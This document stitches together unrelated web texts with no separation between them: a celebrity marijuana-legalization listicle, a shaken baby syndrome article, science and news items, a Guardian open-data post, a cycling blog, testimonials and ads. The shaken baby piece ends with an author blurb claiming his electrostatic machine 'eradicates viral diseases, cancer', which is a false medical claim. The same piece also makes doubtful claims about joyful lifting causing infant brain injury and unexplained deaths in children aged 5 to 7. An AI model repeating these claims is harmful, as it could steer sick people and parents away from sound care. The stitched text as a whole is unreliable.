Marijuana is called many names , across different cultures , largely due to the fact that it ’s been around for over five thousand years .
An estimated 162 million people in the world use cannabis every year , so it should n’t be surprising that so many big names touch the green stuff too .
Some celebrities are more forthcoming with their love of weed than others — ahem , Willie Nelson — but you might be surprised at a few that fight for the national legalization .
Here are 15 of the greatest proponents of national marijuana legalization .
Bill Maher
Social critic , comedian and television host Bill Maher gets passionate about what he supports .
Along with gay marriage and PETA , he supports the legalization of marijuana quite publicly — although that ’s just his style .
He ’s even on the advisory board for NORML , and on the 2009 debut of his HBO show Real Time he proposed just how to solve the economic crisis : by legalizing marijuana .
Adam Carolla
Radio shock jock and television personality Adam Carolla is not a pot smoker anymore , so he says , but that does n’t stop him from supporting the cause — he ’s even joined the MPP ’s advisory board .
He ’s said that pot will eventually win the fight : “ It has to …
We do n’t have a bigger fish to fry than pot ?
It ’s going to happen .
It ’s just going to happen .
It will come to pass , ” stated Carolla .
A lot of progress has been made , but many states are slow to change laws , and marijuana is still prohibited under federal law .
Peter Coyote
Peter Coyote , an American Renaissance man , has dabbled in acting , directing , and authoring books as well as screenplays .
Born to a Jewish family , he has since converted to Zen Buddhism — so it ’s understandable that he has a wide cultural experience and mindset .
He supports marijuana and believes that “ jailing people for the mild alteration of their consciousness will appear to future generations as cruel and draconian as the tortures of the Inquisition appear to us today .
May the reputations of today ’s jailers suffer the same fate as Torquemada ’s reputation today . ”
Strong words .
Jack Black
Funny man Jack Black has entertained us with the likes of both film and music .
In a recent interview , he spoke of his own drug use — trying acid and cocaine as early as the ninth grade .
When it comes to pot — he still smokes — but it ’s now “ an occasional celebratory jay … not a wake - and - bake scenario anymore at all . ”
Either way , he smokes it , supports it , and is on the MPP advisory board .
Jack Nicholson
Actor , film director , and producer Jack Nicholson is so good at what he does , that he ’s been nominated for 12 Academy Awards , and he ’s even won two of them .
He ’s a big voice in Hollywood , so when he says something — people listen .
“ My point of view , while extremely cogent , is unpopular …
That the repressive nature of the legalities vis-a - vis drugs are destroying the legal system and corrupting the police system . ”
Cogent may be an understatement , the man can speak , but what the movement lacks in numbers , guys like Nicholson make up for in words .
Jennifer Aniston
While some may be surprised at the fact that American sweetheart and actress Jennifer Aniston smokes bud , she ’s admitted her love for it on several occasions .
While she was with actor Brad Pitt , they apparently smoked all the time .
Now she will “ Enjoy it once in a while —
There is nothing wrong with that . ”
She ’s been caught by the paparazzi before , smoking in private — we ’re sure she ’d enjoy complete legalization .
Jesse Ventura
Retired professional wrestler turned tv show host Jesse Ventura has dabbled in so many different things in his years , no wonder he looks like a wreck now .
He ’s known to express his support for national medical marijuana but is even more adamant about his support for the complete legalization of the drug .
His mother lived through Prohibition , so he took some pointers from her and believes that :
“ The war on drugs is a failure for the same reasons Prohibition was a failure …
Just imagine if we could find some way for addicts to get their drugs cheaply , safely , and legally .
The bottom would drop out of the illegal drug market .
We ’d see a huge drop in organized and violent crime . ”
Johnny Depp
Award - winning actor Johnny Depp has quite an interesting take on drugs , especially marijuana .
He was known to take quite a few drugs in his day — so he speaks from experience .
In fact , he ’s stated that he wants his kids to get drugs from him if they ’re going to try them , instead of some other dealer .
He ’s been criticized for the statements , but he holds strong and maintains his support for complete legalization .
Joycelyn Elders , M.D.
Dr. Joycelyn Elders , 15th Surgeon General of the United States , went on to become a professor of pediatrics after she was fired by former President Clinton for her radical views .
And by “ radical ” views , we mean the support of condom distribution in schools , abortion rights and suggesting the legalization of drugs to reduce the crime rate .
She was on the advisory board for the MPP and supports them “ because it is a professional organization attempting to change our destructive marijuana laws . ”
Kirsten Dunst
Actress Kirsten Dunst , who gained international fame with her role in Spiderman as Mary Jane Watson , is known for her views on weed .
Not only does she like the drug , but she believes that “ America ’s view on weed is ridiculous ” and that it would make the world “ a better place ” should weed be legalized everywhere .
Michael Bloomberg
Michael Bloomberg , current Mayor of New York City , has smoked weed before — and “ enjoyed it . ”
Back in April 2002 he was featured in an ad that some campaigners had started circulating in protest to Bloomberg arresting pot-smokers .
He was n’t thrilled that they were using his name and words , but it still stands that he ’s fond of the drug .
We think he ’s in denial for political reasons .
Morgan Freeman
Another award - winning actor in support of national legalization , Morgan Freeman still smokes to this day at the ripe age of 83 .
In an interview with the UK newspaper The Guardian , the legendary actor told reporters he had given up his use of hard drugs , but that he would never quit his relationship with Mary Jane .
In fact , he referred to marijuana as “ God ’s own weed . ”
Richard Branson
Sir Richard Branson , British industrialist and chairman of Virgin Group , has a net worth of over 2.5 Billion dollars to go with his douchey attitude — but in all fairness , he ’s a good douche .
He ’s one of the world ’s richest people , but he spends his money in aggressive , forward - thinking ways .
Just look at Virgin Galactic .
Staying true to his out - of - the - box thinking , Branson supports the national legalization of marijuana — and said he would even sell it in Virgin stores if it were openly available .
Stephen King
Stephen King , writer of contemporary horror and suspense , is all for legalization .
Instead of avoiding the topic , as many celebrities and politicians do , he embraces it .
He thinks that “ marijuana should not only be legal [ but that ] it should be a cottage industry .
It would be wonderful for the state of Maine .
There ’s some pretty good homegrown dope . ”
If weed were legalized , he also believes that it would be even better , due to the use of commercial fertilizers and greenhouses .
Brad Pitt
Brad Pitt , actor and film producer , calls himself an artist when it comes to rolling a joint .
Apparently he stopped smoking because it turns him “ into a doughnut , ” but he ’s been known to publicly support marijuana — he smoked on several movie sets , including Ocean ’s Twelve and Thelma and Louise .
He sees the importance of pot legalization on the same level as legalized gay marriage .
Shaken Baby Syndrome ( Battered Baby Syndrome )
by : Junji Takano
“ Shaken baby syndrome ” or “ battered baby syndrome ” is a form of inflicted head trauma , which is usually caused by blows to the head , dropping , shaking , or throwing a child .
Head trauma is one of the highest causes of deaths in child abuse cases around the world .
However , abusive head trauma is not only the results of child abuse , but also due to happiness and joy of parents and surrounding families who acquired long - wanted babies .
Because of joy , parents try to be happy lifting their baby up and want to see their baby smile and shout .
After playing with their baby , and when the baby rest , parents may notice something is going wrong with the baby .
In the beginning , the baby usually cries more , then the baby will stop crying .
At this stage , the brain of the baby is damaged .
Although the majority of victims are infants younger than 1 year old , thousands of babies die around the world even at the age of 5 to 7 not knowing the cause .
Their death may be caused by shaken baby syndrome , too .
Shaken baby syndrome cannot be diagnosed by physical appearance alone but only through CT scan .
As seen on the image below , the sides of the brain had deformed .
Unlike other forms of inflicted head trauma , abusive head trauma results from injuries caused by shaking a child .
Common triggers are frustration , stress , financial problem , or poverty , among parents and caregivers or baby - sitters .
The child 's head rotates because the infant 's neck muscles are not well developed and provide lack of support for their heads .
To avoid this , we do not recommend shaking the baby in any circumstances .
Sometimes , shaking baby syndrome may not cause death , but may lead to abnormal growth of the baby .
Be very careful !
About the Author :
Junji Takano is a Japanese health researcher involved in investigating the cause of many dreadful diseases .
In 1968 , he invented PYRO - ENERGEN , the first and only electrostatic therapy machine that effectively eradicates viral diseases , cancer , and diseases of unknown cause .
Click here to find out more : https://www.pyroenergen.com/
Free health newsletter : https://www.pyroenergen.com/newsletter.htm
------------------------------------------------------------
Reprint Rights :
You may reprint this article within your website , blog , or newsletter as long as the entire article remains the same as well as the “ About the Author ” box .
Post your comment about the article below :
Please enable JavaScript to view the comments powered by Disqus .
In high school biology you probably learned that every one of our body ’s cells contains the same genome , or pattern of DNA — but it turns out that this is not true of the brain .
Researchers at the Salk Institute for Biological Studies recently found that the DNA sequence in human neurons can vary not only from that of the rest of the body but even from one brain cell to the next .
The reason is “ jumping genes , ” DNA elements that can copy and reinsert themselves in different places within the genome .
These mutations increase the total amount of DNA in each neuron .
Geneticist Fred H. Gage and his team at Salk looked at a type of mobile element called LINE - 1 .
Although LINE - 1s are present in all cells of the body , they appeared to be active only in developing brain cells , the researchers found .
The jumping genes generate neuronal diversity , which might help the brain adapt , Gage speculates .
“ Many of the things that we are going to be presented with throughout our lives are unanticipated , ” he says .
The higher the neuronal variety in the brain , the higher the chances that it contains some cells that are capable of rising to these cognitive challenges .
Note :
This story was originally printed with the title " Jumping DNA "
“ You set up the presidential podium and a teleprompter in a sixth grade classroom ? ”
That ’s the exclamatory hypothetical question The Daily Show ’s Jon Stewart posed to President Barack Obama after catching the president using two teleprompters when speaking to a middle school class .
“ Here ’s what health care means to you , ” Stewart mocked , drawing out the syllables in each word in an effort to replicate Obama ’s slow delivery .
“ Let ’s say , you develop ‘ coo - ties . ' ”
ADVERTISEMENT
Stewart lampooned Obama for using a teleprompter in a classroom , saying it was like delivering an “ Oval Office speech from your nap - mat . ”
“ Now since you obviously do n’t have a Rove - type there advising you , let me give you a couple of image minefields to avoid , ” the comic added .
“ If you want to go to the Superbowl , regular box seats will do .
And , if you want to listen to some music , buy an iPod like the rest of us . ”
This video is from Comedy Central ’s The Daily Show , broadcast Jan. 25 , 2010 .
Physorg are reporting an exciting find of what are described as 30 ‘ pebble culture ’ lithic tools , dating back over 1.5 million years , at a site which has been dated argon dated to 1.57 million years old , thanks to an ancient volcanic eruption whose lava flow preserved the ancient ground surfaces .
Although no human remains have been found , many associated fossilized mammal remains came to light at two locations 50 meters apart from one another , with the second producing the lithic assemblage , bearing signs of wear from use – prompting French archaeologists to claim the finds constitute some of the earliest stone tools known anywhere in Europe .
After having being alerted by a local man in the Hérault Valley , Languedoc - Roussillon , who had found ancient teeth and bones in a basalt quarry some 15 years ago , the site was revisited , and another excavation begun nearby .
The research is published in Comptes Rendus Palevol , under the title , Une nouvelle faune de vertébrés continentaux , associée à des artefacts dans le Pléistocène inférieur de l’Hérault ( Sud de la France ) , vers 1,57 Ma , which translates to A new vertebrate fauna associated with lithic artefacts from the Early Pleistocene of the Hérault Valley ( southern France ) dated around 1.57 Ma , authored by Jean - Yves Crochet et al , and for which this is the abstract :
A new vertebrate fauna associated with lithic artefacts from the Early Pleistocene of the Hérault Valley ( southern France ) dated around 1.57 Ma .
Some lithic artefacts associated with an Early Pleistocene ( Upper Villafranchian ) vertebrate fossil assemblage have been found from a quarry exploited for basalt in the lower Hérault Valley ( Languedoc , southern France ) at the Lézignan - le - Cèbe locality .
A preliminary patrimony expertise led us to identify about 20 vertebrate taxa , and the autumnal rainfalls revealed the presence of roughly 30 lithic artefacts of “ pebble culture ” type .
A basalt layer dated at 1.57
My directly overlies the fossiliferous level , extends along the little hill ( locus 2 ) yielding artefacts .
These new promising data offer new perspectives to improve our understanding of Early Pleistocene ecosystems ( and possibly ancient hominin occupation ) of southern Europe .
Although the paper is behind a paywall , I found this ‘ Article In Press ’ ( PDF ) version , which has an abridged English text along the main body in French , about which I ’ll add a few related notes .
The site of Locus 1 is described as underlying an ancient lava flow , ( hence the argon dating ) , and bears fossil vertebrate teeth which are poorly preserved , whilst Locus 2 , 50 metres to the west , is a small hill comprising fluvial and volcanic components , has less but better preserved fossils .
Near the top of the hill is a paleosol , ( an ancient soil layer covered by volcanic material ) , bearing quartzitic pebbles and artefacts .
The dating methods used are as follows :
CO2 laser probe 39 Ar - 40 Ar step - heating analyses were performed on whole rock single grains from 12 samples collected from four close areas on the lava flow covering the study site .
All experiments displayed concordant plateau ages between 1.536±0.063 Ma and 1.627±0.136 Ma .
As all inverse isochrone calculations yielded initial ( 36Ar / 40 Ar ) ratios undistinguishable of the atmospheric ratio , excess argon can be ruled out .
The weighted mean of isochrone ages , at 1.57±0.01 Ma ( 1 ) , is in perfect agreement with the weighted mean of plateau ages at 1.56±0.02 Ma ( 1 ) and is probably the best estimate of the emplacement age of the lava flow .
This age at 1.57±0.01 Ma ( 1 ) postdates the study site .
Amongst the fossilised fauna , a wide range of mammal taxa were identified – Leptobos etruscus , a type of buffalo , Eucladoceros ctenoides vireti , an extinct bush antlered deer , Equus altidens , which I think is a species of zebra , Dicerorhinus etruscus etruscus , rhinocerous , Canis etruscus , a wolf species , Meles thorali which is described as a Eurasian badger , Homotherium crenatidens representing the sabre - toothed cat community , a type of hyena known as Pachycrocuta brevirostris , Prolagus sp. a small , rounded herbivore related to the modern pika , a rodent by the name of Microtus , cf. Allocricetus Apodemus , and Talpa fossilis , a species of mole , and Aves indet , which I take to mean unidentified birds .
This faunal suite is said by the authors to correspond to that known for the Early Pleistocene in central France .
On next to the artefacts , which are described as :
The lithic assemblage includes 20 artefacts of pebbleculture type .
The supports and striking platforms are quartzitic pebbles , large basaltic flakes and fragments , and smaller flint pebbles .
All flakes are exclusively produced by direct percussion , employing a hard stone hammer .
Unilateral alterations can be observed on the periphery of certain flakes .
The pebbles are developed in chopping - tools , and their edges often show traces of repetitive impacts .
The lithic assemblage found at the locus 2 shows similar primary technical features to those from the other Early Pleistocene European sites .
The authors conclude by saying that much work still needs to be done – they state that the faunal remains recovered so far only offer a partial view of the contemporary suite , and although some of the fossils show damage from carnivores , others from Locus 1 appear to have been intentionally broken , quite possibly by those or similar choppers and chopping tools found at Locus 2 – the bones are still undergoing taphonomic analysis to determine whether such breakages were induced by humans , became damaged by carnivores or geologic processes .
To put these 1.57 million year - old pebble tools in an overall context , the earliest known lithic assemblages anywhere date to c.2.5 million years , known as the Oldowan industry from Eastern Africa , whilst those found in Georgia at Dmanisi date to c.1.7 million years .
The earliest known stone tools elsewhere in Europe are mainly from Spain , notably the sites of Atapuerca to the north near Burgos , about 1.2 mya , and Orce to the south in Andalusia .
From the description given , the tools from Lézignan - la - Cébe appear to correspond to the Acheulean industry , and if they are defined as belonging to the chopper / chopping tool industry ( apparently part of the overarching Acheulean ) , they ’d have aspects in common with Asian lithic industries , dating to the Middle / Late Pleistocene .
The oldest known stone tools anywhere in Europe , dating to an estimated 1.8 million years are described at Chilhac , Auvergne , also in modern day France .
Work at the Lézignan - la - Cébe site is set to continue in 2010 .
image from paper : Fig. 4 . Artefacts de Lézignan - la-Cèbe
Reference :
Une nouvelle faune de vertébrés continentaux , associée à des artefacts dans le Pléistocène inférieur de l’Hérault ( Sud de la France ) , vers 1,57 Ma. ,
( trans : A new vertebrate fauna associated with lithic artefacts from the Early Pleistocene of the Hérault Valley ( southern France ) dated around 1.57 Ma. )
Jean - Yves Crochet , Jean - Loup Welcomme , Jérôme Ivorra , Gilles Ruffet , Nicolas Boulbes , Ramon Capdevila , Julien Claude , Cyril Firmat , Grégoire Métais , Jacques Michaux , Martin Pickford , Comptes Rendus Palevol Volume 8 , Issue 8 , December 2009 , Pages 725-736 , doi:10.1016/j.crpv.2009.06.004
Different kinds of fertilisers line the shelves at the new iGrow Superstore in Oakland , California .
iGrow , a 15,000 square foot superstore for hydroponic and medical marijuana growing supplies , is opening its doors today .
The one - stop shopping centre is the largest in the San Francisco area and will offer medical cannabis cards , materials for medical marijuna patients to build their own grow rooms at home as well as a " Grow Squad " that can be hired to consult and build your garden for you
Credit : GETTY
Professor David Nutt said his new group would " take over " drugs advice Five members of the government 's official drugs advisory panel are to join a new independent group set up by sacked drugs adviser , David Nutt .
Prof Nutt said the new group would be " very powerful " and would take over the role of the official Advisory Council on the Misuse of Drugs ( ACMD ) .
He said four of the five ex-ACMD members who resigned in protest at his sacking would also join the new body .
The Home Office said ACMD members were allowed to join another organisation .
BBC Home Affairs correspondent Danny
Shaw said while it was theoretically possible for the drugs experts to be members of both groups , in practice it would make the framing of consistent drugs advice " rather tricky " .
' Powerful grouping '
The new group - to be called the Independent Council on Drug Harms - is due to be launched at a meeting next week .
Prof Nutt said about 20 leading scientists and medical specialists had agreed to attend the meeting including a " significant bloc " of people from the ACMD .
I think in a way we will take over that particular role of the ACMD
Professor David Nutt
He said : " We have a really very , very powerful grouping - more powerful than the ACMD in the past has ever managed to pull together . "
Prof Nutt was sacked as ACMD chairman by the Home Secretary , Alan Johnson , last October for " lobbying " to change government policy on drugs .
Prof Nutt had publicly disagreed with the Government 's decision to re-classify cannabis as a Class B drug and not to downgrade ecstasy .
Five ACMD members then resigned in the row that followed Prof Nutt 's departure .
It has now emerged that two other ACMD members - Peter Martin and Dr Anita Nolan - have also stepped down , though the Home Office said their departures were unrelated to the Nutt affair .
Work ' slowed down '
The professor said the new body he was setting up would provide independent scientific evidence about the effects of drugs , and that its " goal " was to supplant what the ACMD was doing .
" I think in a way we will take over that particular role of the ACMD , " said Prof Nutt .
" We 're going to focus on the science and the ACMD can continue if it likes to deal with issues about treatment provision , about social policy etc . "
The Home Office said that a new ACMD chairman will be announced in the next few weeks , but that it could take two to three months to fill vacancies left by the other resignations .
Our correspondent said the ACMD was crucial to government policy on drugs , because of the panel 's statutory role on drugs policy .
A spokesman admitted that work on the ACMD had " slowed down " after Prof Nutt 's sacking , and that a number of meetings had been postponed .
BBC
News understands that little progress has been made on a crucial area of the ACMD 's work - research into the harms of a new range of synthetic substances , including mephedrone .
The Home Office has said it is a " priority " to find out more about the dangers of the drug and that the ACMD would report back " early " in 2010 .
But a working group , which was to have considered the evidence this month , has had to re-schedule its meeting , after the resignation of the chairman of the group , Dr Les King .
A Home Office spokesman said the ACMD 's work was " still on course " .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Data , data , data .
There 's loads of it out there and more coming your way as governments open their statistics vaults around the world .
First the US with data.gov , then Australia and New Zealand followed suit .
Now it 's the UK 's turn with data.gov.uk .
And that 's in addition to the cities and US states that have made government data available too : London launched very recently - you can get the full set of links for government data sites around the world here .
Ever since the government appointed Sir Tim Berners - Lee as its open data Czar ( working with Prof Nigel Shadbolt from Southampton University ) it was obvious the issue was going to be big for the government , but what does it mean for you ?
You now have tens of sites around the world providing you access , but how do you find them ?
Well , this is now the place .
To coincide with the launch of data .gov.uk , we have created the ultimate gateway to world government data .
At World Government Data you can :
• Search government data sites from the UK , USA , Australia , New Zealand and London ( this comes under United Kingdom , if you want to browse ) in one place and download the data ( more sites to come )
• Help us find the best dataset by ranking them
• Collect similar datasets together from around the world
• Browse all datasets by each country
It 's all been put together with the help of developer Ben Firshman and is the culmination of our year - long project to make data widely available to everyone .
And , even better , we have an API available .
Even though all of these government data sites have enormous quantities of data , they are not in the same formats .
What we have done is put them into a unified form , meaning developers have the opportunity to write applications that compare data between different countries .
If you want the data in Atom or JSON just change the " / search " to " / search.atom " or " / search.json " in the url .
There will be full documentation on this soon .
Watch this space .
The whole project is only going to increase in size and scope .
As Ben Fry has said : " This is only going one way : there is no trend towards less data "
Can you do something with this data ?
• Go straight to our World Government Data search
• Gallery : the full list of government data sites
• Gallery : the top 10 best visualisations and apps
Flickr
Please post your visualisations and mash - ups on our Flickr group or mail us at datastore@guardian.co.uk
• Get the A - Z of data
• More at the Datastore directory
• Follow us on Twitter
Do n't make the same mistake
" I was referred to Edwina by a friend , he promised she was a “ pit bull in heels ” and I have to admit , not only was he right , but it was the best advice I ’ve ever taken .
Once she was on my case Edwina poured her heart and soul into it and worked tirelessly to make sure I had the best representation possible .
She did n’t get my felony reduced to a misdemeanor , she got me acquitted .
My family and I thank you to the stars and back .
You are our hero ! "
Added the letter U , which suggests the United States Postal Service .
Back in the olden days , the sign that a corporation had hit the big time was when it got a single - letter stock symbol on the New York Stock Exchange .
For example , Ford has “ F , ” AT&T has “ T ” ( for telephone ) , Citigroup has “ C ” and U.S. Steel has X ( not sure why , but it always has ) .
On the Web , there ’s another way a single letter can enhance a company ’s prestige .
Go to Google ’s home page or browser toolbar and type a single letter into the search box .
The search engine will then drop down a list of suggestions , based on overall search activity ( you have to have “ show suggestions ” checked for this to happen in your toolbar ) .
There are 26 sites that have the distinction of being the first suggestion for each letter of the alphabet .
Who are these titans of the Internet era ?
A – Amazon
B – Best Buy
C – Craigslist
D – Dictionary.com
E – eBay
F – Facebook
G – Gmail
H – Hotmail [ Still ?
Huh . ]
I – IMDB
J – J.C. Penney
K – Kohl’s
L – Lowe’s
M – MySpace
N – Netflix
O – Office Depot
P – Pandora [ But way to go , Party City , for nabbing the No. 2 spot . ]
Q – QVC [ The No. 3 spot is “ Quotes about life . ”
Nothing specific , just , you know , life . ]
R – Realtor.com
S – Southwest Airlines
T – Target
U – USPS ( for United States Postal Service )
V – Verizon Wireless
W – Wal - Mart
X – Xbox 360
Y – YouTube
Z – Zillow
Cross-referencing Google ’s list with the top suggestions from Microsoft ‘s Bing search engine yields some interesting discrepancies .
On Bing , A is for AOL , B is for Bing ( which is either brilliantly meta , or kind of silly ) , G is for Google ( ouch ! ) , I is for IRS.gov , O is for Orbitz , P is for the gaming site Pogo , U is for “ UTube ” ( which redirects you to YouTube ) , W is for www.google.com ( ouch again ! ) , X is for XM Radio , and Y is for Yahoo .
All of Google ’s top suggestions for a single letter are sites and companies .
No individuals have yet achieved such search stature , although two come close : Lady Gaga and Tiger Woods are Google ’s second suggestion for “ L ” and “ T , ” respectively .
With the publicity they ’re both getting , they might crack the list just yet .
“ The president has talked on a number of occasions about ensuring that the money that taxpayers put up to rescue our financial system is paid back in full , ” Robert Gibbs , the White House spokesman , said .
So has the Treasury secretary , Timothy F. Geithner , who has drawn criticism from both the left and the right as not being tough enough on Wall Street .
Representative Barney Frank of Massachusetts , the Democrat who is chairman of the House banking committee , said the president was required to seek recovery of any losses under the law that created the $ 700 billion financial rescue fund , known as the Troubled Asset Relief Program , in October 2008 .
The law did not spell out how to do so .
“ I did know they were thinking about doing this and I encouraged them , ” Mr. Frank said .
Mr. Frank and others in Congress said they did not know any details , and administration officials say no decisions have been made beyond the fact that a proposal will be in the budget .
Mr. Obama has been meeting with Mr. Geithner and with Lawrence H. Summers , his senior White House economic adviser , to discuss options from the Treasury department .
News of the decision to propose some kind of tax was first reported by Politico .
The 27 - nation European Union called for a global transactions tax in December , and last November Prime Minister Gordon Brown of Britain proposed the idea at a meeting of the Group of 20 developed and emerging nations , saying revenue could be stockpiled to finance any future bailouts .
But Mr. Geithner has said a transaction tax , on trades of complicated derivatives and other financial instruments , would simply be passed through to investors and other customers , and could put American companies at a competitive disadvantage .
Separately , Britain and France have proposed a large tax on financial executives ’ bonuses .
Last year the administration successfully opposed a House bill that would have imposed a substantial levy on executive compensation , and officials continue to argue that corporate shareholders , not the government , should determine pay policies .
Everyone who participates in a co-ed group activity has encountered it .
It may have happened to yourself !
It may even be happening right now and you do n’t even know it !
It happens all the time , all around us .
Falling for someone you spend a lot of time with is part of nature .
Hell , it even happened to Fatty , but most would n’t say that they were head over heels for one of their club members .
Many will admit to a crush or so but nothing that goes anywhere .
Exercise / recreation induced relationships could be a fantastic case study due to so many variables for a thing like that so many people experience .
The whole idea of “ stay with the rider or still be the racerboy you are ” or : “ Uhhh – what can we do together outside of the sports activity that brought us together ?? ? ”
I think it is so prevalent in cycling because :
Cycling is easily a co-ed sport .
Cycling is naturally competitive .
Cycling usually involves people who do n’t look like Rosie O’Donnell , or Louie Anderson
So by all means , with men and women cycling and possibly showing off / competing and looking more attractive than your average American , you can see how at least some check marks on the attraction list could be filled in .
Then there is the facet of having similar interests which never hurts the chances of something to spark , no ?
This all leads to a potential stew pot where two people will eventually hook up .
Heck , I once saw a guy out riding with several girls and I almost challenged him to a race to try to gain alpha male status , but I decided against it .
What if they all slipstreamed and spit me off the group ?
That would have been quite shameful and we all know how much ego is important for a cyclist .
How many people do you know who have ended up marrying someone from a club they were both in ?
Its like a potential / eventual rabbit breeding program in some !
Who would n’t feel accomplished by meeting the girl of their dreams on a bike ride ?
But we all know if you do go after members of the group you must follow the unwritten rule that is the same for dating co workers and get at least one person ’s approval , otherwise you are knowingly liable of disrupting the whole group dynamic by crossing that line .
Then if the relationship fails … you have the awkward responsibility of : 1 . ) either seeing each other every ride or 2 . ) deciding who gets every other week or on the weekday / weekends . 😛
Don told me a story of love when he said :
I went for my first “ real ” road bike ride with my now wife .
She was an avid cyclist and some - time racer .
We rode up Teton Pass , a substantial climb in Wyoming .
She was a gal I ’d known from skiing and a member of the local bike club and offered to ‘ show you some stuff about real bike riding ”
After about 2000 ′ of ~ 10 % .. me on my Schwinn Super Le Tour ~ 30 lb steel touring bike and her on her race - Trek ..
I said something like …
” Hey , let ’s take a breather for a minute ” and she said ..” WE do n’t stop part way up a climb ” and then accelerated leaving me struggling to turn my about 32 rear cog… .
Macho
Me , I vowed right then that that would never ever happen again …
And after a year or two , it never has - yet … .
But I guess that simple ride up that hill sold me on both my wife and ‘ real ’ bike riding …
How romantic , no ?
For some odd and possibly biological / learned - behavior reason , I always tend to abort my feelings and just keep out - riding my crushes every time no matter how much I like them .
For me , I have n’t fallen for someone unless I had to ride over them , and they caused me to crash .
( Get it …?
Falling for someone …? ) 😛
Somehow , keeping up with the leaders in some local group ride is much more important than an attractive woman to me most of the time .
Does anyone know of a relationship that has started due to cycling , and ended due to cycling ?
Example : Boyfriend - X being several rider categories higher than his girlfriend never brings the tempo or intensity down on rides , leading to frustration , resentment and eventually a breakup ?
How many of you have met your cyclist féminin , ending up in marriage and raising a whole garage of bicycles ?
Is n’t that what usually happens ?
Drunk Cyclist agrees with this one .
All in all , let things happen as they happen and do n’t worry about the results or end product until it happens .
If it was meant to be , it was meant to be .
You just never know unless you try ~
Links from images / examples
I have exploited in this post :
http://www.fatcyclist.com/2009/12/23/the-runner/
http://drunkcyclist.com/2009/12/30/new-books-and-old-bikes/
http://canadiancyclist.com
http://dhreno.files.wordpress.com
http://copenhagencyclingchic.com
Also : Thanks to RoadBikeReview.com
38.984702 -80.221746
Restaurant Coupons
Restaurant Coupons for highest rated restaurants near you .
You can buy a $ 25 coupon for $ 10 , but there is almost always an additional 50 % off or more .
These coupons give you a discount as long as you follow the restrictions .
Usually this means spending a certain amount of money and going on an off night .
These are the top rated restaurants from restaurant.com calculated from several different restaurant review websites .
Current Restaurant.com Coupon : 0 % off with Discount Code:n/
a
BAGHDAD  Iraqis on Friday reacted with disbelief , anger and bitter resignation to news that criminal charges in the United States had been dismissed against Blackwater security guards who opened fire on unarmed Iraqi civilians in 2007 in a fusillade that left 17 dead .
“ What are we  not human ? ” asked Abdul Wahab Adul Khader , a 34 - year - old bank employee and one of at least 20 people wounded in the melee .
“ Why do they have the right to kill people ?
Is our blood so cheap ?
For America , the land of justice and law , what does it mean to let criminals go ? ”
The Iraqi government , meanwhile , expressed its “ regrets ” about the ruling .
The problem with the court case , according to the federal judge who issued the ruling , was that statements given by the five Blackwater guards had been improperly used , compromising their right to a fair trial .
The judge , Ricardo M. Urbina , threw out manslaughter and weapons charges against the guards on Thursday , ruling that the case had been improperly built , in part , on sworn statements that they had given to the State Department under the promise of immunity .
We like the overall youthful atmosphere that this place inspires .
A bike in the middle of the living - room , towels randomly scattered throughout the apartment , modern furniture and vivid colors really make this a comfy and interesting home .
Sharp contrasts are also the elements that give life to the rooms , while the solid brick wall gives weight to the white interior .
Every detail is carefully thought out : large windows allow light to flow inside , 3.5 meters of roof creates air , space and light , white walls give calmness and relaxation .
The furniture in the kitchen is made of wood and stainless steel , resistant in time and also aesthetically pleasing .
Meals can also be arranged in the living - room , where the environment really calls out for friends and a good bottle of wine .
I would like to express my extreme satisfaction of how well the migration of our whole ISP went with the help of Visp.net .
In the past , I spent most of my time fighting with local carriers for bandwidth and dial - up dialtone service and billing issues .
Then one day while cleaning my office , I stumbled upon one of Visp .
net ’s letters ( while waiting for one of 9 of my Verizon reps to call back on a 7 - month long battle over billing ) .
I took a chance and called the number and to my surprise someone answered the phone and took the time to explain the program .
After crunching the numbers , I found it to be a viable solution for me or my other hard line ISP .
The thing I liked the best was the per customer billing , so when other bandwidth and Telco providers were slamming my customer base , switching them without warning , now I do n’t have to worry about customer subscriptions having to be a certain level for profitability for the amount of bandwidth , they had to get into long contracts to buy .
Now I know what the profit margin is on every customer and do n’t have to worry about overloading my system , I can now put my effort into selling and not maintaining the high cost of servers and bandwidth contracts .
This has freed up my time considerably .
Every scenario possible was immediately addressed and solved flawlessly by the great team at Visp.net , much to the amazement of my tech staff .
The common phrase was , “ How did they do that ? ”
Well , the answer was simple : Visp.net is the best at what they do .
The dial - up switch was seamless and the DSL and email was even easier .
The nights I spent worrying about the migration were in the end not necessary , just let the pros at Visp .
net do what they do best and do n’t worry .
How my ISP has never ran smoother and my subscribers love it and best of all , they never knew what happened !
Thanks to all the People at Visp. net for helping me in my time of transition .
1997 : Shots heard at besieged embassy in Peru
Gunshots have been heard inside the Japanese embassy in Lima , Peru , where left - wing guerrillas have been holding 72 hostages for the last four weeks .
At 1120 local time , police surrounding the embassy compound dived for cover as members of the Tupac Amaru Revolutionary Movement ( MRTA ) opened fire .
Television cameras showed two armed rebels with grenades strapped to their bodies , wearing bulletproof vests , firing around the compound .
Minutes earlier an International Red Cross mediator , Michel Minnig , had left the building after delivering food and water for those inside .
Mr Minnig returned to the embassy after the shooting to confirm that no - one was harmed .
Japanese ambassador held
On policeman told reporters : " We heard at least 12 gunshots coming in our direction but they appeared to be a provocation rather than an attempt to hit specific targets . "
Later tonight the guerrilla leader Nestor Cerpa Cartolini said his followers had fired the " warning shots " because the police had broken an agreement by coming " fewer than 100 meters " from the compound .
The rebels first stormed the building on 17 December demanding the release of 440 of their comrades in return for the release of the hostages .
Among those held are the Peruvian foreign minister , the Japanese ambassador , and 23 other Japanese nationals .
Tension is now extremely high as the stand - off continues between the two sides , with the Peruvian Government , headed by President Alberto Fujimori , ignoring the demands of the MRTA which has been fighting to overthrow the government since 1984 .
The government has however talked of setting up a " commission of guarantors " to talk through a peaceful solution to the crisis .
Here is a report from my CNAS colleague Jennifer Bernal - Garcia , who is working with Bob Killebrew on the merger of drug gangs and terrorism , about a meeting they held recently with law enforcement experts on gang violence :
Cops are the first line of defense against gangs , and they have a pretty good understanding of the issue .
Talking with them yields a pretty grim assessment :
There is a huge gang problem in the United States .
Our cops in attendance estimated that the U.S. might have up to 1 million gang members , although the problem is often underreported both because it is difficult to detect and because of local politicians ’ incentives to downplay crime figures in their areas .
The gang problem is inherently tied in to broader regional criminal trends .
The extensiveness of drug trafficking south of the border and the degree to which cartels violently contest state authority is well acknowledged .
There is nonetheless a common misperception that drug networks disintegrate when you cross the border into the U.S.
They do n’t .
Gangs — mostly youth gangs — step in to domestically distribute the drugs that cartels traffic in .
